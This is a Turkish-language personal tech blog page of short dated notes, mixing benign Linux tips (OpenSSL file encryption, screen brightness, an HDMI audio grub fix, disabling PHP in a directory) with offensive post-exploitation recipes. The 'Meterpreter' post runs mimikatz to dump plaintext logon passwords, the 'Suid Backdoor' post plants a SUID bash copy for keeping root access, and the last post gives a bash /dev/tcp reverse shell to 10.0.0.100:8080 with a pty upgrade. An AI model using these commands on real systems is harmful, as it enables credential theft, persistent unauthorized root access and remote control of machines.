27 Ağustos 2018 Pazartesi

OpenSSL ile Dosya Şifreleme

Bilgisayarınızdaki bir dosyayı şifrelemek için OpenSSL aşağıdaki gibi kullanılabilir.

Çok gizli bilgilerimizin olduğu gizli.txt dosyasına bir göz atalım...

harun@gondor ~ $ cat gizli.txt 
çok gizli bilgiler

Görüldüğü gibi "çok gizli bilgileri" düz metin olarak saklanmakta. Şimdi OpenSSL kullanarak bu dosyanın şifrelenmiş bir kopyasını oluşturalım.
Aşağıdaki komutu verdiğimizde openssl bizden bir şifreleme parolası isteyecektir. Bu parola şifrelenmiş dosyayı açmak istediğimizde lazım olacağından unutmamak gerekiyor :)

harun@gondor ~ $ openssl enc -aes-256-cbc -in gizli.txt -out sifrelidosya.txt
enter aes-256-cbc encryption password: ******
Verifying - enter aes-256-cbc encryption password: ******


Şimdi oluşan sifrelidosya.txt isimli dosyamızın içeriğine bir bakalım...

harun@gondor ~ $ cat sifrelidosya.txt 

Salted__ ��_��t}��ʵuz � �0,��J�)T���Q#���z��B�


Görüldüğü gibi artık "çok gizli bilgiler"imiz şifreli bir halde ve tekrar okunabilir hale getirmek için; şifreleme sırasında kullandığımzı parola gerekecektir. Şimdi sifrelidosya.txt dosyasını aşağıdaki komutla çözelim..

harun@gondor ~ $ openssl enc -aes-256-cbc -d -in  sifrelidosya.txt
enter aes-256-cbc decryption password: ******

çok gizli bilgiler

Şifreli dosyayı açarak "çok gizli bilgiler"imize ulaştık...

30 Ocak 2016 Cumartesi

Linux Komut Satırından Ekran Parlaklığını Değiştirmek

Her nasıl başardıysam ekran parlaklığını sıfıra indirdim ve simsiyah bir ekranda kaldım. Üstelik ekran parlaklığını arttımak ve azaltmak için kullandığım klavye kısa yol tuşlarının çalışmadığını fark ettim... Tamamen karanlık bir ekranla başbaşa kalmış oldum..

Bu durumdayken SSH ile diz üstü bilgisayarıma bağlanarak aşağıdaki komutu verdim ve ekran parlaklığının okunabilir bir seviyeye yükselmesini sağladım.

echo 400 > /sys/class/backlight/intel_backlight/brightness

Yine lazım olursa diye bu komutu buraya not almış olalım :)

12 Ocak 2016 Salı

Meterpreter için Komut ile Mimikatz Çalıştırmak

Metasploit içerisinden mimikatz çalıştırmak ve parolaların açık halini almak için aşağıdaki tek satırlık komutu kullanabiliriz.

meterpreter > execute -H -i -c -m -f /tmp/mimi/mimikatz.exe -a  '"sekurlsa::logonPasswords full" exit'

2 Ocak 2016 Cumartesi

Audio Playback Too Fast Over HDMI on Linux

HDMI çıkışından TV bağlantısı yaptıktan sonra seslerin olması gerekenden daha hızlı oynatıldığını fark ettim. Bu durum ilk başta komik gelse bile bir süre sonra çözüm bulamadığınızda sinir bozucu oluyor...

Çözüm için ise Asus N550 dizüstü bilgisayarıma kurulu olan Mint üzerinde aşağıdaki ayarları yaptım ve sorunun düzeldiğini gördüm :)

Öncelikle en sevdiğiniz metin editörüyle /etc/default/grub dosyasını açalım...

gedit /etc/default/grub

Aşağıdaki satırı bulalım;

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash" 

 aşağıdaki gibi değiştirelim...

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i915.disable_power_well=0" 
Şimdi update-grub komutunu verelim ve sistemi yeniden başlatalım....

update-grub
reboot

8 Aralık 2015 Salı

Suid Backdoor

Öncelikle root yetkilerine sahip olmuş olmanız gerekiyor. Nasıl root olacağınız bu yazının dışında kalan bir konu. Biz root olduktan sonrası ile ilgileniyoruz :-)

İlk olarak aşağıdaki komutlarla bash kabuğunun bir kopyasını alalım. Ben kendi ev dizinime kopyalamayı tercih ettim. Daha sonra chmod ile suid olarak ayarlayalım.

mordor ~ # cp /bin/bash ~harun/backdoor
mordor ~ # chmod +s ~harun/backdoor

Artık  suid arkakapımız hazır. Bundan sonra yapmamız gereken -p parametresi ile ev dizinimize aldığımız suid bash kabuğumuzun kopyasını çalıştırmak olacak…

harun@mordor ~ $ whoami
harun
harun@mordor ~ $ ./backdoor -p
harun@mordor ~ # whoami
root

2 Aralık 2015 Çarşamba

Bir Dizin Altındaki PHP Dosyalarının Çalıştırılmasını Engellemek

Web sunucunuzdaki bir dizin ve altındaki dizinlerdeki PHP dosyalarının çalıştırılmadan doğrudan kullanıcıya gönderilmesi için .htaccess dosyası oluşturup içerisinde aşağıdakileri yazmak yeterli olacaktır...

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Bu ayardan sonra PHP kodlarınızın yorumlanmadan kullanıcılara gönderileceğini ve kaynak kodunuzun doğrudan kullanıcılar tarafından görülebileceğini unutmayın... 

25 Kasım 2015 Çarşamba

Bash Reverse Shell ile Terminal Almak

Bash ile reverse shell almak için aşağıdaki komut kulanılabilir. Bu komut 10.0.0.100 IP adresinin 8080 portuna bağlantı sağlayacak ve bash kabuğunun kullanılmasına izin verecektir.

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.100/8080 0>&1' > /dev/null

Elde edilen bu komut satırı gerçek bir terminal gibi davranmadığından interafktif işlemlerde aşağıdaki gibi "Pseudo-terminal will not be allocated because stdin is not a terminal." hatası verecekir.

gondor ~ # ssh root@192.168.100.100
ssh root@192.168.100.100
Pseudo-terminal will not be allocated because stdin is not a terminal.

Bu durumda python pty.spawn ile gerçek bir terminal başlatmayı deneyebiliriz. Bunun için aşağıdaki gibi bir komut vermek yeterli olacaktır.

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'